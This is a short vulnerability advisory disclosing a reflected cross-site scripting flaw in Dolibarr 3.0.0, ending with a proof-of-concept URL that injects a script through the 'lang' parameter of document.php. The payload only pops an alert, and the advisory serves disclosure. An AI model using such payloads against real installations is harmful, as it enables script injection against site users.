Dolibarr 3.0.0 Reflected Cross-site Scripting

------------------------------------------------------------------------
Software................Dolibarr 3.0.0
Vulnerability...........Reflected Cross-site Scripting
Threat Level............Low (1/5)
Download................http://www.dolibarr.org/
Discovery Date..........4/21/2011
Tested On...............Windows Vista + XAMPP
------------------------------------------------------------------------
Author..................AutoSec Tools
Site....................http://www.autosectools.com/
Email...................John Leitch <john@autosectools.com>
------------------------------------------------------------------------


--Description--

A reflected cross-site scripting vulnerability in Dolibarr 3.0.0 can
be exploited to execute arbitrary JavaScript.


--PoC--

http://localhost/dolibarr-3.0.0/htdocs/document.php?lang=%22%3E%3Cscript%3Ealert%280%29%3C/script%3E